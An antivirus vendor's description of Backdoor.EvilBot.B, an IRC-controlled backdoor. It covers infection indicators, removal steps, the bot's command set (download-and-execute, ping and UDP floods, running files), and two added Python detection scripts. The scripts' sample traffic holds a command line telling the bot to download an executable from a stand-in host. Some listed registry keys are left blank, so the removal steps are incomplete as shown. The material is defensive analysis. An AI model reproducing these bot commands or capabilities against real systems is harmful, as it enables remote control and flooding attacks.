- Presence of the msgrt.exe file in the Windows folder;
- Presence of the following registry key, which points to the msgrt.exe file in the Windows folder:
- Suspicious connections to port 6667 of the server:
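The three indicators above can be checked programmatically from data collected during triage. The script below is an added example and is not BitDefender's own tool: the file name and the port come from this description, while the directory listing, the exported Run-key values and the netstat lines it consumes are constructed sample data, and the choice of an autostart Run key as the location of the registry entry is an assumption, because the page does not reproduce the key itself.

```python
# Added example (not BitDefender's code): checks the three indicators listed
# above against inputs gathered elsewhere, so it runs offline and can be tested.
# msgrt.exe and port 6667 come from the description; the Run-key location and
# every sample value below are assumptions / constructed data.
import re
from pathlib import PureWindowsPath

MALWARE_FILE = "msgrt.exe"
IRC_PORT = 6667


def file_indicator(listing, windows_dir=r"C:\WINDOWS"):
    """True if msgrt.exe sits directly in the Windows folder.

    `listing` is an iterable of full paths, e.g. from os.scandir on a live
    host or from a directory listing exported during triage. PureWindowsPath
    compares case-insensitively, as Windows itself does."""
    target = PureWindowsPath(windows_dir, MALWARE_FILE)
    return any(PureWindowsPath(p) == target for p in listing)


def registry_indicator(run_values):
    """Return (key path, value name) pairs whose command line launches msgrt.exe.

    `run_values` maps an autostart key path to {value name: command line},
    as exported with `reg query` or read via winreg. Assumption: the backdoor's
    startup entry is a value under one of the Run keys."""
    hits = []
    for key, values in run_values.items():
        for name, cmd in values.items():
            if MALWARE_FILE in cmd.lower():
                hits.append((key, name))
    return hits


# One `netstat -an` line: proto, local addr:port, foreign addr:port, state.
NETSTAT_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)")


def connection_indicator(netstat_lines):
    """Return (remote address, state) for every TCP connection to port 6667.

    `netstat -an` reports numeric addresses, so the match is on the port only;
    the description names eu.undernet.org as the server behind it."""
    hits = []
    for line in netstat_lines:
        m = NETSTAT_RE.match(line)
        if m and int(m.group(4)) == IRC_PORT:
            hits.append((m.group(3), m.group(5)))
    return hits


def assess(listing, run_values, netstat_lines):
    """Combine the three checks into one report."""
    return {
        "file": file_indicator(listing),
        "registry": registry_indicator(run_values),
        "connections": connection_indicator(netstat_lines),
    }


# Constructed sample data standing in for a live host (not real IoCs).
SAMPLE_LISTING = [r"C:\WINDOWS\notepad.exe", r"c:\windows\MSGRT.EXE"]
SAMPLE_RUN = {
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run": {
        "SystemTray": r"C:\WINDOWS\System32\systray.exe",
        "msgrt": r"C:\WINDOWS\msgrt.exe",
    }
}
SAMPLE_NETSTAT = [
    "  TCP    192.168.1.10:1042   10.0.0.5:6667     ESTABLISHED",
    "  TCP    192.168.1.10:1043   10.0.0.9:80       ESTABLISHED",
]

if __name__ == "__main__":
    print(assess(SAMPLE_LISTING, SAMPLE_RUN, SAMPLE_NETSTAT))
```

A connection to port 6667 alone is not conclusive, since legitimate IRC clients use the same port; it is the combination of the file, the startup entry and the connection that points at this backdoor.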
BitDefender can automatically disinfect or delete the files infected by this virus. The modified registry entries must be corrected manually.
- If you don't have BitDefender installed, click here to download an evaluation version;
- Make sure that you have the latest updates using BitDefender Live!;
- Make the following changes in the Windows registry:
Note: Please make sure to modify only the values that are specified. It is also recommended to back up the Windows registry before proceeding with these changes. For more information on backing up the registry, please read the FAQ.
- Select Run... from Start, then type regedit and press Enter;
- Delete the following key:
- Reboot the computer
- Perform a full scan of your system (selecting, from the Action tab, the option Prompt user for action). Choose to delete all the files infected with Backdoor.EvilBot.B.
Mihai Chiriac, BitDefender Virus Researcher
This is a minor modification of Backdoor.EvilBot.B, which BitDefender has detected since November 12th, 2002. This backdoor has two elements: an IRC bot and the backdoor itself. The IRC bot seems to have been written in Romania; it takes girls' names and joins busy Romanian channels, like #deva. The bot actually has the capability to "talk" to the user; it offers to send a picture (which of course is the backdoor).

When the backdoor is first executed, it fetches the address of the RegisterServiceProcess API and uses it to register itself as a hidden task (under Windows 95/98 only); then it creates a registry key for itself so it is automatically executed at every Windows startup. After that, the backdoor connects to port 6667 (IRC) of the server eu.undernet.org, generates a random nickname and joins the channel #ucica. This channel is marked secret, and to join it a user must have a special key.
The commands can be sent either by private message to a single user, or as a message in the channel (those commands will be executed by all users). Available commands:
- upd – updates the bot; this command always fails because the backdoor attempts to update itself from update.ur.address/thepath.exe, an address that obviously does not exist.
- down – downloads a file from the web and executes it;
- nick – changes the nick;
- p1, p2, p3, p4 – floods an internet address (by ping commands);
- msg – sends a trivial message to a user;
- udp – UDP floods an internet address;
- s – executes a file;
- l – parts a channel;
- j – joins a channel;
- r – sends a user a string like evilbot ready for attack...;
- pwX – makes the users quit the channel and terminates the backdoor process; however, the file remains on disk and the registry entry is still there, so on the next reboot the backdoor is executed again.
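From a network-monitoring point of view, the behaviour described above (a join to the secret, keyed channel #ucica followed by command words arriving by private message or in the channel) can be picked out of IRC traffic with a small line classifier. The code below is an added example, not part of BitDefender's description: the IRC message parsing follows the standard `:prefix COMMAND params :trailing` layout, the channel name and command words come from this page, and the sample traffic lines, nicknames and hostnames are constructed. The page gives pwX only as a prefix, so anything starting with "pw" is treated as that command.

```python
# Added example (not BitDefender's code): flags, in IRC protocol lines, the
# join to the keyed channel and messages that start with one of the bot's
# command words. Sample lines below are constructed, not captured traffic.
BOT_CHANNEL = "#ucica"
COMMANDS = {"upd", "down", "nick", "p1", "p2", "p3", "p4",
            "msg", "udp", "s", "l", "j", "r"}
COMMAND_PREFIX = "pw"   # pwX: the page gives only the prefix


def parse_irc(line):
    """Split one IRC message into (prefix, COMMAND, params).

    The trailing parameter (after ' :') may contain spaces and is kept whole."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if sep:
        params.append(trailing)
    command = params.pop(0) if params else ""
    return prefix, command.upper(), params


def classify(line):
    """Return the findings for one line; an empty list means nothing suspicious."""
    _, command, params = parse_irc(line)
    findings = []
    if command == "JOIN" and params:
        channels = params[0].split(",")
        keys = params[1].split(",") if len(params) > 1 else []
        if BOT_CHANNEL in channels:
            findings.append("join-bot-channel")
            if keys:                      # channel is keyed, per the description
                findings.append("join-with-key")
    elif command == "PRIVMSG" and len(params) >= 2:
        target, text = params[0], params[1]
        words = text.split()
        word = words[0].lower() if words else ""
        is_pw = word.startswith(COMMAND_PREFIX) and len(word) > len(COMMAND_PREFIX)
        if word in COMMANDS or is_pw:
            scope = "channel" if target.startswith("#") else "private"
            findings.append(f"bot-command:{word}:{scope}")
    return findings


def scan(lines):
    """Return (line, findings) for every line that produced at least one finding."""
    report = []
    for line in lines:
        findings = classify(line)
        if findings:
            report.append((line, findings))
    return report


# Constructed sample of what the infected host's IRC session might look like.
SAMPLE_TRAFFIC = [
    "NICK maria1234",                                          # random nickname
    "JOIN #ucica s3cret",                                      # keyed channel join
    ":boss!b@h.example PRIVMSG #ucica :upd",                   # command to every bot
    ":boss!b@h.example PRIVMSG maria1234 :down http://example.invalid/x.exe",
    ":ana!a@h.example PRIVMSG #deva :salut, ce faci?",         # ordinary chat
]

if __name__ == "__main__":
    for line, findings in scan(SAMPLE_TRAFFIC):
        print(f"{findings!s:40} {line}")
```

The single-letter commands (s, l, j, r) and everyday words such as msg or nick will also match normal conversation, so on their own they are weak signals; the join to #ucica with a key is the finding worth alerting on, and the command matches are best read as supporting evidence for a host that has already produced it.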